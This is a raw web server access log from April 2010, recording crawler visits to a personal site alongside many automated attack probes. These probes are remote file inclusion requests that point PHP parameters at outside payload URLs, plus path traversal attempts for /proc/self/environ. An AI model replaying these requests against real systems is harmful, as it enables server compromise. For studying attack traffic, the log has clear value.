85.114.135.218 - - [20/Apr/2010:01:29:20 -0500] "GET //sitemap.php?path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.813"
85.114.135.218 - - [20/Apr/2010:01:29:21 -0500] "GET /logs//sitemap.php?path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.813"
87.250.255.243 - - [20/Apr/2010:01:34:16 -0500] "GET /logs/access_log.1219363200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.205.4.73 - - [20/Apr/2010:01:36:17 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.nmnudegirls.com/asu/includes/f1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.205.4.73 - - [20/Apr/2010:01:36:17 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.nmnudegirls.com/asu/includes/f1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.205.4.73 - - [20/Apr/2010:01:36:17 -0500] "GET /logs/access_log.1230076800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.nmnudegirls.com/asu/includes/f1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
67.205.4.73 - - [20/Apr/2010:01:36:18 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.nmnudegirls.com/asu/includes/f1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.205.4.73 - - [20/Apr/2010:01:36:18 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.nmnudegirls.com/asu/includes/f1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.205.4.73 - - [20/Apr/2010:01:36:18 -0500] "GET /logs/access_log.1230076800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.nmnudegirls.com/asu/includes/f1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:01:40:41 -0500] "GET /logs/access_log.1271462400 HTTP/1.1" 200 716852 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.44 - - [20/Apr/2010:01:42:28 -0500] "GET /logs/access_log.1161043200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [20/Apr/2010:01:44:21 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:01:44:21 -0500] "GET /logs/access_log.1262563200////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:01:44:21 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 200 2463 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:01:44:22 -0500] "GET /logs/access_log.1263427200////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:01:46:07 -0500] "GET /logs/access_log.1201478400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.39 - - [20/Apr/2010:01:46:28 -0500] "GET /logs/access_log.1183334400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:01:50:38 -0500] "GET /logs/access_log.1237939200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.50 - - [20/Apr/2010:01:52:29 -0500] "GET /logs/access_log.1218067200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:01:55:09 -0500] "GET /logs/access_log.1229126400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:02:00:36 -0500] "GET /logs/access_log.1214956800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/Apr/2010:02:01:15 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.142.68.135 - - [20/Apr/2010:02:03:30 -0500] "GET /logs/access_log.1220054400//sitemap.php?path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
174.142.68.135 - - [20/Apr/2010:02:03:31 -0500] "GET //sitemap.php?path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.834"
174.142.68.135 - - [20/Apr/2010:02:03:31 -0500] "GET /logs//sitemap.php?path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.834"
87.250.255.243 - - [20/Apr/2010:02:06:23 -0500] "GET /logs/access_log.1257033600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.221.63.33 - - [20/Apr/2010:02:07:55 -0500] "GET //?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 200 991 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:02:07:56 -0500] "GET /logs//?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 200 2449 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:02:07:56 -0500] "GET /logs/access_log.1262304000//?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 300 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:02:09:35 -0500] "GET //?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 200 991 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:02:09:35 -0500] "GET /logs/access_log.1240099200//?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 300 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:02:09:35 -0500] "GET /logs//?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 200 2449 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:02:09:42 -0500] "GET //?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 200 991 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:02:09:42 -0500] "GET /logs//?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 200 2449 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:02:09:42 -0500] "GET /logs/access_log.1240099200//?page=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 300 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:02:10:02 -0500] "GET /logs/access_log.1245628800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
82.22.207.181 - - [20/Apr/2010:02:11:52 -0500] "GET /logs/access_log.1219708800//admin/spaw/spaw_control.class.php?spaw_root=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
82.22.207.181 - - [20/Apr/2010:02:11:53 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
82.22.207.181 - - [20/Apr/2010:02:11:53 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
67.195.112.180 - - [20/Apr/2010:02:13:05 -0500] "GET /logs/access_log.1217289600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/Apr/2010:02:13:41 -0500] "GET /logs/access_log.1246838400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.174.28.46 - - [20/Apr/2010:02:16:46 -0500] "GET //?page=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.174.28.46 - - [20/Apr/2010:02:16:46 -0500] "GET /logs//?page=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 2461 "-""Mozilla/5.0"
212.174.28.46 - - [20/Apr/2010:02:16:46 -0500] "GET /logs/access_log.1265414400//?page=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
212.174.28.46 - - [20/Apr/2010:02:16:53 -0500] "GET //?page=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.174.28.46 - - [20/Apr/2010:02:16:53 -0500] "GET /logs/access_log.1240099200//?page=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
212.174.28.46 - - [20/Apr/2010:02:16:53 -0500] "GET /logs//?page=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 2461 "-""Mozilla/5.0"
202.69.230.122 - - [20/Apr/2010:02:17:03 -0500] "GET /logs/access_log.1265760000//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.69.230.122 - - [20/Apr/2010:02:17:03 -0500] "GET /logs/access_log.1266278400//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.69.230.122 - - [20/Apr/2010:02:17:03 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
202.69.230.122 - - [20/Apr/2010:02:17:03 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.174.28.46 - - [20/Apr/2010:02:17:33 -0500] "GET //?page=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.174.28.46 - - [20/Apr/2010:02:17:34 -0500] "GET /logs//?page=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 2461 "-""Mozilla/5.0"
212.174.28.46 - - [20/Apr/2010:02:17:34 -0500] "GET /logs/access_log.1240099200//?page=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:02:20:06 -0500] "GET /logs/access_log.1257120000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.55.97.178 - - [20/Apr/2010:02:20:30 -0500] "GET /logs/errors.php?error=http://200.21.184.243/appserv/id1.gif???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.55.97.178 - - [20/Apr/2010:02:20:30 -0500] "GET /errors.php?error=http://200.21.184.243/appserv/id1.gif???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
74.55.97.178 - - [20/Apr/2010:02:20:34 -0500] "GET /logs/access_log.1219363200%20%20/errors.php?error=http://200.21.184.243/appserv/id1.gif???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:02:24:39 -0500] "GET /logs/access_log.1223078400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.195 - - [20/Apr/2010:02:26:28 -0500] "GET /logs/access_log.1255046400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.174.65.26 - - [20/Apr/2010:02:29:06 -0500] "GET //send_reminders.php?noSet=0&includedir=http://200.21.184.243/appserv/id1.gif???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.174.65.26 - - [20/Apr/2010:02:29:06 -0500] "GET /logs//send_reminders.php?noSet=0&includedir=http://200.21.184.243/appserv/id1.gif???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
81.174.65.26 - - [20/Apr/2010:02:29:06 -0500] "GET /logs/access_log.1212969600%20%20//send_reminders.php?noSet=0&includedir=http://200.21.184.243/appserv/id1.gif???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:02:30:07 -0500] "GET /logs/access_log.1221955200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.55.97.178 - - [20/Apr/2010:02:30:32 -0500] "GET /logs/access_log.1219363200/errors.php?error=http://200.21.184.243/appserv/id1.gif???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.174.65.26 - - [20/Apr/2010:02:31:27 -0500] "GET /logs/access_log.1212969600//send_reminders.php?noSet=0&includedir=http://200.21.184.243/appserv/id1.gif???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.46.204.237 - - [20/Apr/2010:02:31:28 -0500] "GET /logs/access_log.1179532800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:02:37:24 -0500] "GET /logs/access_log.1235692800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.55.97.178 - - [20/Apr/2010:02:37:42 -0500] "GET /logs/access_log.1212969600/errors.php?error=http://200.21.184.243/appserv/id1.gif???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.137.163.133 - - [20/Apr/2010:02:38:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
78.137.163.133 - - [20/Apr/2010:02:38:03 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [20/Apr/2010:02:38:03 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [20/Apr/2010:02:38:03 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [20/Apr/2010:02:38:03 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [20/Apr/2010:02:38:03 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [20/Apr/2010:02:38:03 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [20/Apr/2010:02:38:03 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [20/Apr/2010:02:38:03 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [20/Apr/2010:02:38:03 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [20/Apr/2010:02:38:03 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [20/Apr/2010:02:38:03 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
67.195.112.180 - - [20/Apr/2010:02:38:47 -0500] "GET /logs/access_log.1264464000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/Apr/2010:02:41:58 -0500] "GET /logs/access_log.1171497600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.41 - - [20/Apr/2010:02:43:58 -0500] "GET /artwork/dioramas.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.195 - - [20/Apr/2010:02:45:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.168.176.11 - - [20/Apr/2010:02:45:46 -0500] "GET //login.php?dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.168.176.11 - - [20/Apr/2010:02:45:46 -0500] "GET /logs/access_log.1258934400//login.php?dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.168.176.11 - - [20/Apr/2010:02:45:46 -0500] "GET /logs//login.php?dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
119.63.198.3 - - [20/Apr/2010:02:46:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.250.255.243 - - [20/Apr/2010:02:48:19 -0500] "GET /logs/access_log.1221350400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.235 - - [20/Apr/2010:02:49:20 -0500] "GET /logs/access_log.1221091200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:02:51:40 -0500] "GET /logs/access_log.1261958400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:02:56:13 -0500] "GET /logs/access_log.1256169600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
61.67.201.187 - - [20/Apr/2010:03:00:40 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:00:40 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:00:40 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:00:46 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:00:46 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:00:46 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:01:14 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:01:14 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:01:14 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:01:17 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:01:17 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:01:18 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:01:26 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:01:26 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:01:26 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:01:27 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:01:27 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:01:27 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:02:00 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:02:00 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [20/Apr/2010:03:02:00 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:03:02:37 -0500] "GET /logs/access_log.1225929600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
220.232.195.131 - - [20/Apr/2010:03:05:57 -0500] "GET /logs/index.php?option=com_ticketbook&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [20/Apr/2010:03:05:58 -0500] "GET /logs/index.php?option=com_ticketbook&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [20/Apr/2010:03:05:58 -0500] "GET /index.php?option=com_ticketbook&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
220.232.195.131 - - [20/Apr/2010:03:05:58 -0500] "GET /index.php?option=com_ticketbook&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""-"
87.250.255.243 - - [20/Apr/2010:03:09:01 -0500] "GET /logs/access_log.1255392000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.113.184.23 - - [20/Apr/2010:03:11:11 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
64.113.184.23 - - [20/Apr/2010:03:11:11 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
64.113.184.23 - - [20/Apr/2010:03:11:11 -0500] "GET /logs/access_log.1268611200/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
64.113.184.23 - - [20/Apr/2010:03:11:11 -0500] "GET /logs/access_log.1268611200/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
64.113.184.23 - - [20/Apr/2010:03:11:11 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
64.113.184.23 - - [20/Apr/2010:03:11:11 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
64.113.184.23 - - [20/Apr/2010:03:12:02 -0500] "GET /logs/access_log.1268611200/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
64.113.184.23 - - [20/Apr/2010:03:12:02 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
64.113.184.23 - - [20/Apr/2010:03:12:02 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:03:13:35 -0500] "GET /logs/access_log.1226275200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.72.194.58 - - [20/Apr/2010:03:16:31 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.72.194.58 - - [20/Apr/2010:03:16:31 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.72.194.58 - - [20/Apr/2010:03:16:31 -0500] "GET /logs/access_log.1268265600%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
207.46.204.197 - - [20/Apr/2010:03:18:57 -0500] "GET /logs/access_log.1202601600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:03:19:03 -0500] "GET /logs/access_log.1239580800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.113.99.66 - - [20/Apr/2010:03:19:32 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.113.99.66 - - [20/Apr/2010:03:19:32 -0500] "GET /logs/access_log.1268265600%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
66.113.99.66 - - [20/Apr/2010:03:19:32 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
66.113.99.66 - - [20/Apr/2010:03:21:15 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
